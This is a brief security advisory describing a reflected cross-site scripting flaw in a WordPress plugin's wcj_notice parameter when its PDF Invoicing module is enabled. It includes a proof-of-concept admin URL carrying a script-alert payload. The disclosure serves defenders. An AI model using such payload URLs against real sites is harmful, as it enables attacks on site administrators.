The plugin does not sanitise and escape the wcj_notice parameter before outputting it back in the admin dashboard when the Pdf Invoicing module is enabled, leading to a Reflected Cross-Site Scripting
With the PDF Invoicing module active:
https://example.com/wp-admin/edit.php?post_type=shop_order&paged=1&generated=1&generated_type=invoice&generated_invoice=1&post_status=all&wcj_notice=<script>alert(/XSS/)</script>